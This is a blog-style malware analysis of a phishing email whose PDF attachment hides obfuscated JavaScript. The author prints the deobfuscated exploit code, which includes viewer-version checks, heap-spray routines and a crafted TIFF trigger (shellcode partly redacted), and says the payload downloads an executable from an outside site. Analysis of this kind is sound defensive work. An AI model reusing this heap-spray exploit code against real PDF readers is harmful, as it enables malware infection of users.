Decoding a PDF Virus E-Mail 

Today I received a malicious email via gmail.

Title: “Check this. It might be useful for u.”
From: XXXX@aol.com via mx.aol.com 11:55 AM (2 hours ago) to Nick

With some garbled HTML data in the text area and a MIME PDF attachment “621624.pdf”

The email came from a someone who must have had me on their address book as I communicated with them previously years ago.

Of course I had to investigate and uploaded the pdf to jeek.org for further analysis.

http://jsunpack.jeek.org/?report=4696a30d0b4b840770048971815fa6f85840a960

The PDF contained a hidden javascript package which was further obfuscated.

After manually de-obfuscating the code I came up with:

var encoded = "a3tf31jre0........." (redacted)
var decode1 = encoded.replace(/a3tf31jre/g,"%");
var decoded = unescape(decode1);

The encoded string breaks out to:

var j_IgC = [31, 31, 15, 23];

function _k_m()
{
return app;
}


function _b_(xVgFqV)
{
var ___N = "";
___N = unescape(xVgFqV);
return ___N;
}


function get_ver()
{
var ver = _k_m().viewerVersion.toString();
ver = ver.replace(".", "");
while (ver.length < 4)
{
ver += "0";
}
ver = parseInt(ver, 10);
return ver;
}

function make_block(xVgFqV, len)
{
while (xVgFqV.length * 2 < len)
{
xVgFqV += xVgFqV;
}
xVgFqV = xVgFqV.substring(0, len/ 2);
return xVgFqV;
}

function heap_spray3(scode)
{
scode = _b_(scode);
var sclen = scode.length * 2;
var fasdds = _b_("%u9090");
var spray = make_block(fasdds,0x2000 - sclen);
var block = scode + spray;
block = make_block(block,0x80000 - 0x40);
for (var i = 0;i<0x190;i ++)
{
j_IgC[i] = block.substr(0,block.length - 1) + fasdds;
}
return;
}


function make_str(xVgFqV,len)
{
while (xVgFqV.length < len){ xVgFqV += xVgFqV; }
xVgFqV = xVgFqV.substring(0, len);
return xVgFqV;
}


function num2hex(num)
{
var xVgFqV = num.toString(16);
var len = xVgFqV.length;
var ret = (len % 2) ? "0" + xVgFqV : xVgFqV;
return ret;
}

function str2uni(xVgFqV)
{
var ret = "";
for (var i = 0;i < xVgFqV.length;i += 2)
{
ret += "%u";
ret += num2hex(xVgFqV.charCodeAt(i + 1));
ret += num2hex(xVgFqV.charCodeAt(i));
}
return ret;
}

function hex2str(hex)
{
var ret = "";
for (var i = 0;i < hex.length;i += 2) { var b = hex.substr(i,2); var num = parseInt(b,16); ret += String.fromCharCode(num); } return ret; } exploit(); function exploit() { var ver = get_ver(); if (ver >= 8000)
{
var tiff = "SUkqADggAABB";
var nops = make_str("QUFB",0x2ae8);
var start "..."; (redacted)
var foot = "";
var sc_hex = "";

if (ver < 8201)
{
foot = "..."; (redacted)
var sc_hex = "..."; (redacted)
}
else
{
foot = "..."; (redacted)
sc_hex = "..."; (redacted)
}

if (foot.length)
{
var ret = [tiff,nops,start,foot].join("");
var sc_str = hex2str(sc_hex);
var scode = str2uni(sc_str);
heap_spray3(scode);
pwzh6lr.rawValue = ret;
}
}
}

After the PDF viewer is “heap sprayed” ( http://en.wikipedia.org/wiki/Heap_spraying ) the exploit payload that is injected goes out to download http://earthexplore.com/PDFS/XXXXXXX.exe (redacted). I have not analyzed the executable it self but would imagine that it is some sort of a trojan.